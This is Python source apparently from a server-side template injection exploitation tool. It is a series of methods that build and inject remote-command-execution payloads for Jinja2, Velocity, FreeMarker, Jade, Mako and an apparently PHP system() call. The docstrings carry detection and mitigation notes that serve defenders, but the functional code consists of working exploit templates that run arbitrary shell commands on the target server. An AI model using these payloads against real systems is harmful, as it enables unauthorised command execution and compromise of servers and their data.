def evaluate(self, code):
    """Wrap *code* in an ``eval``-lookup template and submit it via ``self.inject``.

    The template stores the quoted code in a template variable ``d``, walks
    ``[].__class__.__base__.__subclasses__()`` until it reaches the class
    named ``catch_warnings``, scans the values of that class's
    ``__init__.func_globals`` for a dict holding an ``eval`` key, and
    renders ``b['eval'](d)``.

    Notes:
        * Each doubled percent sign is a literal ``%`` escaped for the ``%``
          operator, so the rendered text uses ``{% ... %}`` block tags.
        * ``func_globals`` is a Python 2 function attribute, so the lookup
          only resolves where the template is rendered by Python 2.
        * ``quote`` is defined outside this view; presumably it escapes the
          characters that would close the double-quoted ``d`` literal.
          TODO confirm.
        * Detection: the ``__class__.__base__.__subclasses__()`` chain in a
          request value is a high-signal indicator of template injection.
        * Mitigation: do not build template source from request data; a
          sandboxed environment that refuses underscore-prefixed attribute
          access stops this walk at its first step.

    Returns whatever ``self.inject`` returns for the formatted template.
    """
    template = """{%% set d = "%s" %%}{%% for c in [].__class__.__base__.__subclasses__() %%} {%% if c.__name__ == 'catch_warnings' %%} {%% for b in c.__init__.func_globals.values() %%} {%% if b.__class__ == {}.__class__ %%} {%% if 'eval' in b.keys() %%} {{ b['eval'](d) }} {%% endif %%} {%% endif %%} {%% endfor %%} {%% endif %%} {%% endfor %%}"""
    rendered = template % quote(code)
    return self.inject(rendered)
def execute(self, command):
    """Submit a Velocity-syntax template that runs *command* via ``self.inject``.

    The template uses ``$class.inspect(...)`` to obtain ``java.lang.String``,
    ``java.lang.Character`` and ``java.lang.Runtime``, calls
    ``getRuntime().exec(...)`` with the quoted command, waits for the
    process, then emits its input stream one character per ``#foreach``
    iteration over ``[1..$out.available()]``.

    Author's note, kept from the original comment: the technique from
    http://blog.portswigger.net/2015/08/server-side-template-injection.html
    did not work when the author tested it; the check stays active to
    cover previously affected versions.

    Notes:
        * ``quote`` is defined outside this view; presumably it escapes the
          characters that would close the double-quoted ``exec`` argument.
          TODO confirm.
        * Detection: ``$class.inspect(`` together with ``java.lang.Runtime``
          in a request value is a direct indicator in request logs.
        * Mitigation: the template depends on a ``$class`` reference being
          present in the rendering context; leaving reflection helpers out
          of contexts that render user-influenced templates removes it.

    Returns whatever ``self.inject`` returns for the formatted template.
    """
    template = """#set($str=$class.inspect("java.lang.String").type) #set($chr=$class.inspect("java.lang.Character").type) #set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("%s")) $ex.waitFor() #set($out=$ex.getInputStream()) #foreach($i in [1..$out.available()]) $str.valueOf($chr.toChars($out.read())) #end"""
    rendered = template % quote(command)
    return self.inject(rendered)
def execute(self, command):
    """Run *command* by passing an ``os.popen`` expression to ``self.evaluate``.

    The quoted command is formatted into the Python expression
    ``__import__("os").popen("...").read()``, which is handed to
    ``self.evaluate``; the result of that call is returned unchanged.

    Notes:
        * ``quote`` is defined outside this view; presumably it escapes the
          characters that would close the double-quoted ``popen`` argument.
          TODO confirm.
        * Detection: ``__import__("os")`` followed by ``popen(`` in a
          request value is worth alerting on, whichever template engine
          ends up rendering it.
    """
    escaped_command = quote(command)
    expression = '__import__("os").popen("%s").read()' % escaped_command
    return self.evaluate(expression)
def execute(self, command):
    """Submit a FreeMarker-syntax template that runs *command* via ``self.inject``.

    The template instantiates ``freemarker.template.utility.Execute`` with
    the ``?new()`` built-in, binds it to ``ex``, and renders the result of
    ``ex("...")`` called with the quoted command.

    Notes:
        * ``quote`` is defined outside this view; presumably it escapes the
          characters that would close the double-quoted argument.
          TODO confirm.
        * Detection: the class name ``freemarker.template.utility.Execute``
          next to ``?new`` in a request value is a direct indicator.
        * Mitigation: a FreeMarker ``Configuration`` whose new-builtin
          class resolver is ``TemplateClassResolver.SAFER_RESOLVER``
          refuses to instantiate ``Execute`` through ``?new``.

    Returns whatever ``self.inject`` returns for the formatted template.
    """
    template = """<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("%s") }"""
    rendered = template % quote(command)
    return self.inject(rendered)
def execute(self, command):
    """Format *command* into a FreeMarker ``Execute`` template and inject it.

    The template assigns ``"freemarker.template.utility.Execute"?new()`` to
    ``ex`` and interpolates ``ex("...")`` with the quoted command as its
    argument. The value returned by ``self.inject`` is passed back as is.

    Notes:
        * ``quote`` comes from outside this view; presumably it escapes the
          characters that would close the double-quoted argument.
          TODO confirm.
        * The template only works where ``?new`` may instantiate
          ``freemarker.template.utility.Execute``; setting the new-builtin
          class resolver to ``TemplateClassResolver.SAFER_RESOLVER`` on the
          FreeMarker ``Configuration`` denies that.
    """
    escaped_command = quote(command)
    return self.inject(
        """<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("%s") }""" % escaped_command
    )
def execute(self, code, prefix=None, suffix=None, blind=False):
    """Escape *code* with ``quote`` and delegate to the parent ``execute``.

    Only ``code`` is transformed; ``prefix``, ``suffix`` and ``blind`` are
    forwarded positionally and unchanged to ``super(Jade, self).execute``.

    NOTE(review): ``quote`` and the parent implementation are outside this
    view, so what the escaping covers and what the parent returns cannot
    be confirmed from here.
    """
    # The code is escaped before submission; nothing else is rewritten here.
    escaped_code = quote(code)
    return super(Jade, self).execute(escaped_code, prefix, suffix, blind)
def execute(self, command):
    """Submit a template line that runs *command* via Node's ``execSync``.

    The line starts with ``= `` followed by a JavaScript expression that
    reaches ``child_process`` through
    ``global.process.mainModule.require`` and calls ``execSync`` with the
    quoted command. It is handed to ``self.inject`` and that call's result
    is returned.

    Notes:
        * ``quote`` is defined outside this view; presumably it escapes the
          characters that would close the double-quoted ``execSync``
          argument. TODO confirm.
        * Detection: ``global.process.mainModule.require`` or
          ``child_process`` in a request value is a direct indicator of
          template injection against a Node.js renderer.
    """
    template = """= global.process.mainModule.require('child_process').execSync("%s")"""
    rendered = template % quote(command)
    return self.inject(rendered)
def execute(self, command):
    """Submit a template with an embedded Python block that runs *command*.

    After formatting, the template contains a ``<% ... %>`` block that
    imports ``os`` and stores ``os.popen("...").read()`` in ``x``, followed
    by ``${x}`` to render the captured output. Each doubled percent sign in
    the literal is an escaped ``%`` for the ``%`` operator.

    Notes:
        * ``quote`` is defined outside this view; presumably it escapes the
          characters that would close the double-quoted ``popen`` argument.
          TODO confirm.
        * Detection: a ``<%`` block containing ``import os`` in a request
          value is a direct indicator; template source should come only
          from trusted files, never from request data.

    Returns whatever ``self.inject`` returns for the formatted template.
    """
    template = """<%% import os; x=os.popen("%s").read() %%>${x}"""
    rendered = template % quote(command)
    return self.inject(rendered)
def execute(self, command):
    """Run *command* by passing a ``system("...");`` statement to ``self.evaluate``.

    The quoted command is formatted into the statement and the result of
    ``self.evaluate`` is returned unchanged.

    NOTE(review): the language that interprets the statement is decided by
    ``self.evaluate``, which is outside this view (the syntax looks like
    PHP; confirm). ``quote`` is also defined elsewhere; presumably it
    escapes the characters that would close the double-quoted argument.
    """
    statement = """system("%s");""" % quote(command)
    return self.evaluate(statement)
def execute(self, command):
    """Format *command* into a Node ``execSync`` template line and inject it.

    The resulting line is ``= `` followed by
    ``global.process.mainModule.require('child_process').execSync("...")``
    with the quoted command as the argument. ``self.inject`` receives the
    line and its return value is passed back as is.

    Notes:
        * ``quote`` comes from outside this view; presumably it escapes the
          characters that would close the double-quoted argument.
          TODO confirm.
        * Detection: the ``mainModule.require('child_process')`` chain is
          the part to match on in request logs.
    """
    escaped_command = quote(command)
    return self.inject(
        """= global.process.mainModule.require('child_process').execSync("%s")""" % escaped_command
    )
def evaluate(self, code, prefix=None, suffix=None, blind=False):
    """Escape *code* with ``quote`` and delegate to the parent ``evaluate``.

    Only ``code`` is transformed; ``prefix``, ``suffix`` and ``blind`` are
    forwarded positionally and unchanged to
    ``super(Jinja2, self).evaluate``.

    NOTE(review): ``quote`` and the parent implementation are outside this
    view, so what the escaping covers and what the parent returns cannot
    be confirmed from here.
    """
    # The code is escaped before submission; nothing else is rewritten here.
    escaped_code = quote(code)
    return super(Jinja2, self).evaluate(escaped_code, prefix, suffix, blind)